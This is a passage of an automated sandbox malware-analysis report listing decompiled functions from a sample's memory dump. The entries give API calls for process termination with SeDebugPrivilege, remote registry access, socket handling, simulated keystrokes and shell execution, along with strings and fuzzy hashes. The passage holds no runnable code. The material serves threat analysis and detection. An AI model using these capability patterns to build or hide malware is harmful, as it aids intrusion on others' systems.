OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F168B
GetLastError.KERNEL32 ref: 006F169E
OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F16CA
TerminateProcess.KERNEL32(00000000,00000000), ref: 006F1746
GetLastError.KERNEL32(00000000), ref: 006F1751
CloseHandle.KERNEL32(00000000), ref: 006F1786

Strings

SeDebugPrivilege, xrefs: 006F16A9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: baf87d1ebb11da4da722b9564b48bb66491f33af2ef4b1c5bf01c3f4fae2a12e
Instruction ID: 0f508b8374571de0ee753c6b42cd6e8d5dc7b5582d12e6069dcec36996254f4a
Opcode Fuzzy Hash: baf87d1ebb11da4da722b9564b48bb66491f33af2ef4b1c5bf01c3f4fae2a12e
Instruction Fuzzy Hash: 8341A971A40206AFDB14EF58C8A2FBDB7A6AF45350F04804DFA0A9F392DB789C008F45

Function 006D6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 006D62D6

Strings

question, xrefs: 006D628F
info, xrefs: 006D6277
blank, xrefs: 006D6258
stop, xrefs: 006D62A7
warning, xrefs: 006D62BF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 9893db39aeac1d897682d221794018f0cf3d9383b3191b34c83f690086137df1
Instruction ID: addde76ad9a067d4ff6c839c69f0b9c40397016a8c0c9335cd91754b3c209531
Opcode Fuzzy Hash: 9893db39aeac1d897682d221794018f0cf3d9383b3191b34c83f690086137df1
Instruction Fuzzy Hash: E311E972A08343BAE7055B55DC92DEA739D9F17724B20002FFA05AA3C2F7F4AF414669

Function 006D757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 006D7595
LoadStringW.USER32(00000000), ref: 006D759C
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006D75B2
LoadStringW.USER32(00000000), ref: 006D75B9
_wprintf.LIBCMT ref: 006D75DF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006D75FD

Strings

%s (%d) : ==> %s: %s %s, xrefs: 006D75DA

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 033758fc87473226e80bd0c05c18451116accb4ab9209f645978389438a19d64
Instruction ID: a2563cc969fd807dc9a6a6807003c9d809fd36beac1104d9a8b824e944f3aead
Opcode Fuzzy Hash: 033758fc87473226e80bd0c05c18451116accb4ab9209f645978389438a19d64
Instruction Fuzzy Hash: 5C0136F2900248BFE761A794ED89EE7776CD708701F008496B745E2181EA7C9EC48F75

Function 006F2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

Part of subcall function 006F3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006F2AA6,?,?), ref: 006F3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006F2AE7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: b85d6418ce5d7306b5cf1ade68b3c9a27904e57c02e60b9ded17d88c665e4ed9
Instruction ID: ee75fa33219ac7daec306dadc24d3470588845e5f6b29d0ed1bbb1a9796bd1f5
Opcode Fuzzy Hash: b85d6418ce5d7306b5cf1ade68b3c9a27904e57c02e60b9ded17d88c665e4ed9
Instruction Fuzzy Hash: D5916D716042069FCB41EF14C8A1B6EB7E6BF88314F04881DFA969B2A1DB34ED45CF46

Function 006E9A66 Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 006E9B38
WSAGetLastError.WS2_32(00000000), ref: 006E9B45
__WSAFDIsSet.WS2_32(00000000,?), ref: 006E9B6F
WSAGetLastError.WS2_32(00000000), ref: 006E9B9F
htons.WS2_32(?), ref: 006E9C51
inet_ntoa.WS2_32(?), ref: 006E9C0C

Part of subcall function 006CE0F5: _strlen.LIBCMT ref: 006CE0FF
Part of subcall function 006CE0F5: _memmove.LIBCMT ref: 006CE121

_strlen.LIBCMT ref: 006E9CA7
_memmove.LIBCMT ref: 006E9D10

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3637404534-0
Opcode ID: c7eba24dad947f02537fa6f6a4b21820213dd1f20063eadc624fcdc0427ecc31
Instruction ID: b4355e33fdca657715e83fef8d72f7f1a22c014c68d01b77dae03d44aa95f321
Opcode Fuzzy Hash: c7eba24dad947f02537fa6f6a4b21820213dd1f20063eadc624fcdc0427ecc31
Instruction Fuzzy Hash: AA819B71504340ABCB10EF69CC45EABBBEAEF89724F10862DF5559B291DB30DD04CBA6

Function 006BB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 006BB744

Part of subcall function 006B8A0C: __FF_MSGBANNER.LIBCMT ref: 006B8A21
Part of subcall function 006B8A0C: __NMSG_WRITE.LIBCMT ref: 006B8A28
Part of subcall function 006B8A0C: __malloc_crt.LIBCMT ref: 006B8A48

__lock.LIBCMT ref: 006BB757
__lock.LIBCMT ref: 006BB7A3
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00746948,00000018,006C6C2B,?,00000000,00000109), ref: 006BB7BF
RtlEnterCriticalSection.NTDLL(8000000C), ref: 006BB7DC
RtlLeaveCriticalSection.NTDLL(8000000C), ref: 006BB7EC

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: b60ca3eac3b3ea226d5dc90bd51b9a73f19362b16d788b931f3464b354a6d46e
Instruction ID: 27fdade783b94ba115ec4804af87d95e0b550398f282a96d74c2406cc184431b
Opcode Fuzzy Hash: b60ca3eac3b3ea226d5dc90bd51b9a73f19362b16d788b931f3464b354a6d46e
Instruction Fuzzy Hash: 8D4127F1D003159BEB109F68D8443ECB7A5BF41335F10922DE425AB2D1DBF8A881CB98

Function 006DA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006DA1CE

Part of subcall function 006B010A: std::exception::exception.LIBCMT ref: 006B013E
Part of subcall function 006B010A: __CxxThrowException@8.LIBCMT ref: 006B0153

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006DA205
RtlEnterCriticalSection.NTDLL(?), ref: 006DA221
_memmove.LIBCMT ref: 006DA26F
_memmove.LIBCMT ref: 006DA28C
RtlLeaveCriticalSection.NTDLL(?), ref: 006DA29B
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006DA2B0
InterlockedExchange.KERNEL32(?,000001F6), ref: 006DA2CF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: a79c3a6125f752522140afd6e0ab9683df45a5b5613e701468d39fd27e2bb18e
Instruction ID: 6c22b97fda17a8826cb50241736e6941964b439d6ddafb5c4f9ffbb4c10fa00a
Opcode Fuzzy Hash: a79c3a6125f752522140afd6e0ab9683df45a5b5613e701468d39fd27e2bb18e
Instruction Fuzzy Hash: 5531D271A00105EBDB10EFA9CC85AEFBBB9FF45310B1480A9F904AB286D774DE50CB65

Function 006F8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006F8CF3
GetDC.USER32(00000000), ref: 006F8CFB
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006F8D06
ReleaseDC.USER32(00000000,00000000), ref: 006F8D12
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 006F8D4E
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006F8D5F
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006FBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 006F8D99
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006F8DB9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 2f3bf449221156513660bafe89b558ada1a3910246556abf4ff173a67fce5bd8
Instruction ID: 2c309c6da2d895e12305ec7902ee4771b32bda7779cd16a69ac7e693801ac3b7
Opcode Fuzzy Hash: 2f3bf449221156513660bafe89b558ada1a3910246556abf4ff173a67fce5bd8
Instruction Fuzzy Hash: 43316D72100614BFEB208F54CC49FEA3BA9EF49755F048055FE089A2D1DB799C41CB74

Function 006E1BFA Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

Part of subcall function 00693BCF: _wcscpy.LIBCMT ref: 00693BF2

_wcstok.LIBCMT ref: 006E1D6E
_wcscpy.LIBCMT ref: 006E1DFD
_memset.LIBCMT ref: 006E1E30

Strings

t:tp:t, xrefs: 006E1E40
X, xrefs: 006E1E68

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$t:tp:t
API String ID: 774024439-1633481122
Opcode ID: b9d3c598bf1f4929a548a45a5dd6f459353fcfea5c9f4ca858b974b790185198
Instruction ID: 573d89307a4f2eadd90a3536f9d8665bf0db8e15889d839e7c2ad240aabb3db0
Opcode Fuzzy Hash: b9d3c598bf1f4929a548a45a5dd6f459353fcfea5c9f4ca858b974b790185198
Instruction Fuzzy Hash: 52C161716043419FC754EF24C891A9AB7EABF85310F00496DF89A9B3A2DB30ED45CB96

Function 006AB40F Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ce175e2feeb575d7fe95e263110b674d455f10abdb862c12500d2c4ac0ea78
Instruction ID: c4d507eac95596118f1fe417144ae52c97fbbb59ce4715dbf24e0315293e90cf
Opcode Fuzzy Hash: 17ce175e2feeb575d7fe95e263110b674d455f10abdb862c12500d2c4ac0ea78
Instruction Fuzzy Hash: 6D714B71900109EFCB14DF98CC84AEEBBB5FF8A314F148159F915AA292C7349E42CF64

Function 006F2121 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006F214B
_memset.LIBCMT ref: 006F2214
ShellExecuteExW.SHELL32(?), ref: 006F2259

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

Part of subcall function 00693BCF: _wcscpy.LIBCMT ref: 00693BF2

CloseHandle.KERNEL32(00000000), ref: 006F2320
FreeLibrary.KERNEL32(00000000), ref: 006F232F

Strings

@, xrefs: 006F2225

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 6cc44fb8965a9d9131d3b02bc29b88131c659ea857de1f840850755445cce201
Instruction ID: 546064eebbb9c8e55b19f3dbdee0cc9b4ea34f5d42089077a639208788ae6248
Opcode Fuzzy Hash: 6cc44fb8965a9d9131d3b02bc29b88131c659ea857de1f840850755445cce201
Instruction Fuzzy Hash: CF717D71A0061A9FCF04EFA4C8919AEB7F6FF49310B108459E956AB751DB34AE40CF94

Function 006D47DE Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 006D481D
GetKeyboardState.USER32(?), ref: 006D4832
SetKeyboardState.USER32(?), ref: 006D4893
PostMessageW.USER32(?,00000101,00000010,?), ref: 006D48C1
PostMessageW.USER32(?,00000101,00000011,?), ref: 006D48E0
PostMessageW.USER32(?,00000101,00000012,?), ref: 006D4926
PostMessageW.USER32(?,00000101,0000005B,?), ref: 006D4949

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: af8dfb55f6e32ce0a90dcbc9d714eeb8a3c84f89b5cc2ada9d3d9704b4c469a7
Instruction ID: 4346bdea2f8cad6a04da226e3d944121164b34cd3c5efb495d1259d09ffef3ae
Opcode Fuzzy Hash: af8dfb55f6e32ce0a90dcbc9d714eeb8a3c84f89b5cc2ada9d3d9704b4c469a7
Instruction Fuzzy Hash: 8951C4A0D087D13EFB364225C855BFBBFAA5B06344F08858AE1D55A7C2CAE8EC84D750

Function 006D45F9 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 006D4638
GetKeyboardState.USER32(?), ref: 006D464D
SetKeyboardState.USER32(?), ref: 006D46AE
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006D46DA
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006D46F7
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006D473B
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006D475C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e47f4b4ab3c9043e2c90448aae6ecd4731b390ed324103fb1e52477406e0b67f
Instruction ID: 03e59550724312062f3c30524c9b280803ece4172ab0a7b0b804e40572b0b2ea
Opcode Fuzzy Hash: e47f4b4ab3c9043e2c90448aae6ecd4731b390ed324103fb1e52477406e0b67f
Instruction Fuzzy Hash: C051C4A0D047D53BFB3687248C45BFA7E9A5B07304F08848AE1E546BC2DBA5EC94DB50

Function 006D86AE Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 006D86BB
_wcsncpy.LIBCMT ref: 006D86F0
_wcsncpy.LIBCMT ref: 006D8722
_wcsncpy.LIBCMT ref: 006D8755
_wcsncpy.LIBCMT ref: 006D8797
_wcsncpy.LIBCMT ref: 006D87D1
_wcsncpy.LIBCMT ref: 006D8800

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: a6c41500d6c2306209264081328fe5751c656a473b19e21987d462a1cb6c4d5f
Instruction ID: ab0a13b23e85ccd0349af77bd293a1ca95aaa053b2ec43bd1894b1d8d143f522
Opcode Fuzzy Hash: a6c41500d6c2306209264081328fe5751c656a473b19e21987d462a1cb6c4d5f
Instruction Fuzzy Hash: 654149A5C1021579CF50EBF4CC8BACFB7BDAF05310F508866E525F3221EA34E69587A9

Function 006F3C63 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 006F3C92
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006F3CBC
FreeLibrary.KERNEL32(00000000), ref: 006F3D71

Part of subcall function 006F3C63: RegCloseKey.ADVAPI32(?), ref: 006F3CD9
Part of subcall function 006F3C63: FreeLibrary.KERNEL32(?), ref: 006F3D2B
Part of subcall function 006F3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006F3D4E

RegDeleteKeyW.ADVAPI32(?,?), ref: 006F3D16

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
